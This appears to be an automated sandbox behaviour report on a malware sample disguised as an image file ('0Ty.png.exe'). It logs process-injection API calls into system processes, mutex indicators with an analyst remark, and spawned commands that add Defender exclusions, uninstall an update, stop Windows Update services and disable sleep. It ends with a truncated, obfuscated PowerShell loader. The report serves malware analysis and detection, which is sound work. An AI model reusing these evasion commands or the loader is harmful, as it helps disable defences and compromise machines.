Code function: 73_2_0000000140001860 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, |
73_2_0000000140001860 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8AF63E |
28_2_00007FFD9B8AF63E |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8ADD58 |
28_2_00007FFD9B8ADD58 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8AE329 |
28_2_00007FFD9B8AE329 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8AFDE9 |
28_2_00007FFD9B8AFDE9 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8AF659 |
28_2_00007FFD9B8AF659 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 28_2_00007FFD9B8ADCD3 |
28_2_00007FFD9B8ADCD3 |
Source: C:\Windows\System32\conhost.exe |
Code function: 31_3_0000024089941FF4 |
31_3_0000024089941FF4 |
Source: C:\Windows\System32\conhost.exe |
Code function: 31_3_0000024089953CD8 |
31_3_0000024089953CD8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 31_3_000002408994D510 |
31_3_000002408994D510 |
Source: C:\Windows\System32\conhost.exe |
Code function: 31_2_000002408A2A48D8 |
31_2_000002408A2A48D8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 31_2_000002408A29E110 |
31_2_000002408A29E110 |
Source: C:\Windows\System32\conhost.exe |
Code function: 31_2_000002408A292BF4 |
31_2_000002408A292BF4 |
Source: C:\Windows\System32\dialer.exe |
Code function: 64_2_0000000140003240 |
64_2_0000000140003240 |
Source: C:\Windows\System32\dialer.exe |
Code function: 64_2_00000001400027D0 |
64_2_00000001400027D0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8ADD78 |
66_2_00007FFD9B8ADD78 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9B8AE349 |
66_2_00007FFD9B8AE349 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9BB23542 |
66_2_00007FFD9BB23542 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 66_2_00007FFD9BB230D1 |
66_2_00007FFD9BB230D1 |
Source: C:\Windows\System32\conhost.exe |
Code function: 67_3_0000014ECB483CD8 |
67_3_0000014ECB483CD8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 67_3_0000014ECB47D510 |
67_3_0000014ECB47D510 |
Source: C:\Windows\System32\conhost.exe |
Code function: 67_3_0000014ECB471FF4 |
67_3_0000014ECB471FF4 |
Source: C:\Windows\System32\conhost.exe |
Code function: 67_2_0000014ECB4B48D8 |
67_2_0000014ECB4B48D8 |
Source: C:\Windows\System32\conhost.exe |
Code function: 67_2_0000014ECB4AE110 |
67_2_0000014ECB4AE110 |
Source: C:\Windows\System32\conhost.exe |
Code function: 67_2_0000014ECB4A2BF4 |
67_2_0000014ECB4A2BF4 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 68_2_0000000140001CF0 |
68_2_0000000140001CF0 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 68_2_0000000140002D54 |
68_2_0000000140002D54 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 68_2_0000000140001274 |
68_2_0000000140001274 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 68_2_0000000140002434 |
68_2_0000000140002434 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 68_2_00000001400031D8 |
68_2_00000001400031D8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_3_00000225DC611FF4 |
69_3_00000225DC611FF4 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_3_00000225DC623CD8 |
69_3_00000225DC623CD8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_3_00000225DC61D510 |
69_3_00000225DC61D510 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC642BF4 |
69_2_00000225DC642BF4 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC6548D8 |
69_2_00000225DC6548D8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC64E110 |
69_2_00000225DC64E110 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC672BF4 |
69_2_00000225DC672BF4 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC6848D8 |
69_2_00000225DC6848D8 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 69_2_00000225DC67E110 |
69_2_00000225DC67E110 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_3_00000202C0AB1FF4 |
70_3_00000202C0AB1FF4 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_3_00000202C0AC3CD8 |
70_3_00000202C0AC3CD8 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_3_00000202C0ABD510 |
70_3_00000202C0ABD510 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_2_00000202C0AE2BF4 |
70_2_00000202C0AE2BF4 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_2_00000202C0AF48D8 |
70_2_00000202C0AF48D8 |
Source: C:\Windows\System32\lsass.exe |
Code function: 70_2_00000202C0AEE110 |
70_2_00000202C0AEE110 |
Source: C:\Windows\System32\svchost.exe |
Code function: 71_3_000002A6612DD510 |
71_3_000002A6612DD510 |
Source: C:\Windows\System32\svchost.exe |
Code function: 71_3_000002A6612D1FF4 |
71_3_000002A6612D1FF4 |
Source: C:\Windows\System32\svchost.exe |
Code function: 71_3_000002A6612E3CD8 |
71_3_000002A6612E3CD8 |
Source: C:\Windows\System32\svchost.exe |
Code function: 71_2_000002A66130E110 |
71_2_000002A66130E110 |
Source: C:\Windows\System32\svchost.exe |
Code function: 71_2_000002A661302BF4 |
71_2_000002A661302BF4 |
Source: C:\Windows\System32\svchost.exe |
Code function: 71_2_000002A6613148D8 |
71_2_000002A6613148D8 |
Source: C:\Windows\System32\dwm.exe |
Code function: 72_3_000002BAAEDD1FF4 |
72_3_000002BAAEDD1FF4 |
Source: C:\Windows\System32\dwm.exe |
Code function: 72_3_000002BAAEDDD510 |
72_3_000002BAAEDDD510 |
Source: C:\Windows\System32\dwm.exe |
Code function: 72_3_000002BAAEDE3CD8 |
72_3_000002BAAEDE3CD8 |
Source: C:\Windows\System32\dwm.exe |
Code function: 72_2_000002BAAEE02BF4 |
72_2_000002BAAEE02BF4 |
Source: C:\Windows\System32\dwm.exe |
Code function: 72_2_000002BAAEE0E110 |
72_2_000002BAAEE0E110 |
Source: C:\Windows\System32\dwm.exe |
Code function: 72_2_000002BAAEE148D8 |
72_2_000002BAAEE148D8 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_3_00000248FFB53CD8 |
73_3_00000248FFB53CD8 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_3_00000248FFB4D510 |
73_3_00000248FFB4D510 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_3_00000248FFB41FF4 |
73_3_00000248FFB41FF4 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_0000000140001CF0 |
73_2_0000000140001CF0 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_0000000140002D54 |
73_2_0000000140002D54 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_0000000140002434 |
73_2_0000000140002434 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_00000001400031D8 |
73_2_00000001400031D8 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_0000000140001274 |
73_2_0000000140001274 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_0000024880602BF4 |
73_2_0000024880602BF4 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_000002488060E110 |
73_2_000002488060E110 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 73_2_00000248806148D8 |
73_2_00000248806148D8 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7688:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7920:120:WilError_03 |
Source: C:\Windows\System32\dialer.exe |
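Mutant created: \BaseNamedObjects\Global\gohkfyvqbpmecnid |
Note: the conhost.exe SM0:<pid>:120:WilError_03 mutants in this list are commonly created by ordinary Windows processes and are weak indicators. This Global\ name from dialer.exe is the sample-specific one and the better candidate for a host-based indicator, although such names may be randomized per build. |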
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7676:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2416:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7928:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7784:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:6992:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7832:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7888:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7492:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:8100:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:3848:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7972:120:WilError_03 |
Source: unknown |
Process created: C:\Users\user\Desktop\0Ty.png.exe "C:\Users\user\Desktop\0Ty.png.exe" |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\sc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc |
|
Source: C:\Windows\System32\sc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv |
|
Source: C:\Windows\System32\sc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits |
|
Source: C:\Windows\System32\sc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc |
|
Source: C:\Windows\System32\sc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 |
|
Source: C:\Windows\System32\powercfg.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 |
|
Source: C:\Windows\System32\powercfg.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 |
|
Source: C:\Windows\System32\powercfg.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe |
|
Source: C:\Windows\System32\powercfg.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\0Ty.png.exe |
Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "HGLZSDMZ" |
|
Source: C:\Windows\System32\sc.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[C
har](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[- |